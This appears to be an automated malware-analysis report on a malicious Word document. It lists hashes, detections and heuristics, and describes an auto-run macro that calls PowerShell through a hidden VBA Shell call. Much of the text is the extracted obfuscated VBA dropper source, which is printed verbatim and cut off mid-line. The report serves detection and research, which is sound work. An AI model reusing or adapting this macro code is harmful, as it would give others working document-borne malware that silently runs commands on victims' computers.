Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 496883a9a588233d…

MALICIOUS

Office (OLE)

Size: 105.2 KB
Created: 2018-06-13 18:57:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: d3dc7d7c4bb7f0aaddbcf563fb421dc2
SHA-1: a24724cbee1a3905e6e36f6ca4b4d6b5d1543061
SHA-256: 496883a9a588233de10e8fa434cffe510daf8ca436bd101112fcf6b5e5eb07fd
Risk score: 222

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic), T1204.002 (User Execution: Malicious File)

The sample is a Microsoft Office Word document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' together with the auto-executing 'Document_Open' macro indicates that the macros are designed to execute arbitrary commands as soon as the document is opened. The VBA code assembles a command string from obfuscated fragments (string concatenation, Chr() calls and junk arithmetic spread across several functions) and passes it to VBA.Shell() with a window-style argument that evaluates to 0 (hidden window); the visible fragment "owers" next to a Chr(... + vbKeyP + ...) expression is consistent with a PowerShell invocation, most likely used to download and run a secondary payload. The ClamAV detection further supports the malicious verdict.

Heuristics (6)

  • ClamAV: Doc.Malware.Valyria-6769654-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Malware.Valyria-6769654-0
  • VBA macros detected [medium, 3 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA [critical, OLE_VBA_SHELL]
    Shell() call in VBA
  • Document_Open macro [high, OLE_VBA_DOCOPEN]
    Document_Open macro
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13585 bytes
SHA-256: f0cf9f003d2e95b94cb4c09863733bf0b75d5733c74070fb975567db175ab08d

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "CiHHNPiVWVp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ZfpOouF()
On Error Resume Next
mKMRs = Tan(64876)
MVCkun = ZSQqOt
BhPmm = NXzsk
fAAZG = CDbl(uKDYm * CDbl(VABAG + Int(Kjpos * Rnd(78264)) * kNVWaJ * Log(91798 * zzRGSI - RYzdvF + Fix(51))))
GsPmM = Tan(67616)
QqHLz = CDbl(oYncO)
uljfIA = Tan(32032)
cUblpc = CBnKW
wjHJu = mvtlU
Etuja = CDbl(dvHiz * CDbl(tSbBMN + Int(UwcQlv * Rnd(51503)) * RKdYfV * Log(99351 * cZslrf - GNkHQ + Fix(51))))
UbLKI = Tan(31948)
dIozTL = CDbl(dJUdtd)
zcfas = Tan(76434)
qAXMt = bzzPL
zQEmY = lcEQd
wwIPE = CDbl(LnFaH * CDbl(owoKj + Int(zIKRw * Rnd(22053)) * pMVru * Log(96422 * KoYbQf - zJvGZJ + Fix(51))))
ZutWV = Tan(67325)
VLjzz = CDbl(OKpwLc)
YtEPU = Tan(35922)
vfobu = zwUHiq
KSocr = TjapTw
wmNzES = CDbl(pMVWwV * CDbl(vnWZz + Int(KSEBXj * Rnd(66678)) * XAHfQ * Log(32841 * PwufYi - zwSjW + Fix(51))))
CMskq = Tan(31698)
iiMZYj = CDbl(RLNqf)
ZfpOouF = ZAQhfKrzhu + VBA.Shell(jjZowsEEF + Chr(PROUXnw + vbKeyP + rpUbJUzbK) + "owers" + PQqVK + NDkWZJHwSw + UwjLz + okEzTabHzBL + cRZqYWA + ojhPBidkRv, 55450 - 55450)
VIVMwU = Tan(90141)
zMzzOE = IqvUs
hwhlUH = bulicB
KsEdV = CDbl(VkKaij * CDbl(GGmQV + Int(jWwzDG * Rnd(73731)) * VEiZGp * Log(86097 * IaSWQ - zoHHlu + Fix(51))))
cBivr = Tan(20860)
vBXjH = CDbl(jbBXuU)
FijwRV = Tan(35135)
sVjbq = VulaTJ
ENZvmI = QMGjrZ
XvYNhQ = CDbl(FEFCr * CDbl(wkPoN + Int(XkjnC * Rnd(24720)) * bIwkL * Log(55304 * LcAnw - EczJTs + Fix(51))))
AwMMK = Tan(39537)
IoIWA = CDbl(pMIUtZ)
End Function
Private Sub Document_open()
On Error Resume Next
OaWjh = Tan(75872)
wXpnDE = JwBzHH
RDorR = BOQqoa
XNIwU = CDbl(kwHWOp * CDbl(jasjI + Int(DPGoh * Rnd(84886)) * rjGdv * Log(71648 * ptnoff - FNJhaC + Fix(51))))
AwczS = Tan(80840)
DRYaE = CDbl(jAqda)
QCMQw = Tan(88015)
diCUq = BLiBF
mcONb = IEWfG
FjYmSc = CDbl(dYCTR * CDbl(OEGrG + Int(MfblNY * Rnd(80722)) * JBuiRB * Log(20469 * ZEWQUK - wjIzu + Fix(51))))
GdJjzO = Tan(95775)
dvLNc = CDbl(uciXCQ)
ZfpOouF
NUEWY = Tan(43154)
CtfIT = tcPQV
tGisJ = UQrRMF
lilAsa = CDbl(rGztFm * CDbl(jBizIj + Int(PWAJL * Rnd(3880)) * lTMozu * Log(18103 * HwoofP - HknXGl + Fix(51))))
vQswhO = Tan(35763)
krhYv = CDbl(mmEGr)
ovXUb = Tan(21605)
jkPRkH = UQdrJ
mUWGH = kIAVf
fiiVhL = CDbl(RitzUV * CDbl(cpljtU + Int(VlhXYB * Rnd(5598)) * lctko * Log(15874 * XAYhz - rtXBl + Fix(51))))
vGVGsk = Tan(57001)
KzBwI = CDbl(hwtQD)
End Sub


Attribute VB_Name = "nmOYNISZkz"
Function PQqVK()
On Error Resume Next
cjZfGV = Tan(13487)
lQdOtE = SLKibL
qhvuiQ = TMstIf
TFOfc = CDbl(kIjbGQ * CDbl(HnnNm + Int(YtMDPc * Rnd(30357)) * HilSo * Log(34134 * qKZTin - hBUnR + Fix(51))))
pKPnzK = Tan(29205)
GCwDM = CDbl(cdvIR)
MEKqiiMizpF = "HeLL -jOin" + "('41L70h94R" + "122S111M79M8" + "8S4" + "5@48Z45R99" + "K1" + "04@" + "122h32h98K" + "111Z103Z10" + "4L110S12"
jbfQPX = Tan(57320)
ddWmA = jshkG
bjHaP = kdEGL
SHLDK = CDbl(BVowwT * CDbl(spEBY + Int(wwoKjV * Rnd(77076)) * iPpHEW * Log(11290 * PlYuTK - WdnnDX + Fix(51))))
zbFFM = Tan(37668)
fhWHSG = CDbl(qrzRza)
XQXUV = "1@" + "45M127" + "~1" + "08L99M1" + "05h98M96K54~41M" + "78@93Z1"
UlXsBD = Tan(74204)
BVpKM = hHtzS
RGqYL = rWmwqm
FNzCu = CDbl(XLQnAl * CDbl(QXlPD + Int(ikIMnE * Rnd(20184)) * Ivuwqw * Log(68226 * VPZtdL - BTqmK + Fix(51))))
iNbnH = Tan(66198)
BKzkiO = CDbl(WrJnR)
UaYUrDAwwU = "23M90S1" + "00h1" + "22M45M48" + ">45>9" + "9K104M122K32h98"
jioMG = Tan(46759)
FMLRT = dJUYRc
zUFbJu = micjwt
SPhhp = CDbl(FpHNfk * CDbl(aGAnU + Int(UThQOB * Rnd(33076)) * ucRQTG * Log(20727 * uoVAO - JMswZi + Fix(51))))
TnJWDp = Tan(89756)
lzTjXE = CDbl(NqwLd)
ntwKOKFqEol = "K111S103" + "R104" + ">110Z1" + "21L45~94>" + "116S126R12" + "1M104~96~3" + "5M67Z10"
hHCmBq = Tan(88003)
ClJiM = tCzWq
juVpc = jwWvk
ZPTTXt = CDbl(vfQbBE * CDbl(zwPOsw + Int(jVSqbq * Rnd(39764)) * MwchjM * Log(80644 * iEKlnp - STlrK + Fix(51)
... (truncated)